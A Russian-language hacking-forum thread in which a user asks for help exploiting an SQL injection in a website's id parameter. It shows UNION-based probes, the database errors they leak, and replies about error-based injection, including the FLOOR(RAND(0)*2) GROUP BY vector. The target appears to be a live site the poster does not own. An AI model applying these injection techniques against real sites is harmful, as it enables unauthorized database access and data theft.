Помогите раскрутить скуль

Discussion in 'Песочница' started by user6334, 29 Oct 2015.

  1. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    id = 1
    На выводе пустая страница

    id = 1 UNION SELECT 1
    Выдает:
    Code:
    Ошибка базы данных.
    
    Error Number: 1054
    
    Unknown column 'verdict' in 'field list'
    
    SELECT COUNT(rating) AS count FROM complex_reviews WHERE complex_id=1 UNION SELECT 1 AND verdict = 1
    
    Filename: /modules/developers/models/reviews.php
    
    Line Number: 242

    id = 1 UNION SELECT 1--
    Выдает:
    Code:
    Ошибка базы данных.
    
    Error Number: 1222
    
    The used SELECT statements have a different number of columns
    
    SELECT `complex`.*, `developers`.`developer_title`, `developers`.`developer_id`, `developers`.`developer_city`, `developers`.`developer_logo` FROM (`complex`) JOIN `developers` ON `complex`.`developer_id` = `developers`.`developer_id` WHERE complex_id = 1 UNION SELECT 1-- ORDER BY `developers`.`developer_id` desc LIMIT 1
    
    Filename: /modules/developers/models/model_developers.php
    
    Line Number: 35
    Помогите разобраться, хавидж раскрутил, так что мне вдвойне обидно (
     
  2. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    20
    Reputations:
    1
    Дык Вы бы адресок дали, а то как-то не очень в теории раскручивать)) Авось, всем колхозом раздолбаем))
     
  3. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Долбать не надо, тем более всем колхозом) Считайте, что это задача из учебника: добавляем 2 минуса и получаем совершенно другой запрос - в школе мы такого не проходили
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    912
    Reputations:
    363
    у вас два разных запроса. сначала не работает 1 из-за того, что нет колонки verdict, во второй раз ошибка в другом запросе, т. к. в первом все равно, а во втором не хватает колонок. возможно, что пройдет и union-based, но error-based должен сработать точно
     
    _________________________
  5. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    А понял, значение параметра id поочередно передается в несколько запросов, так? Но как выводить поля в случае error-based?
     
  6. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    ты ссылку дай да и дело с концом :)
     
  7. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    912
    Reputations:
    363
    в случае error-based знать количество полей не нужно. подбираете вектор, затем пишете запрос
     
    _________________________
  8. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    это я понял, но при ошибке ведь не выводиться то, что нужно. Приведите пример запроса, пожалуйста
     
  9. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    295
    Likes Received:
    135
    Reputations:
    29
    Почитай
     
  10. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Да знаю, я. Некто Квазар решил что
    sELECT COUNT(*),FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.TABLES GROUP BY x
    выдает ошибку, но не удосужился объяснить, почему, вот и спрашиваю
    а попробуйте вместо двойки написать 1000. То же? А попробуйте теперь 46436794876
     
Loading...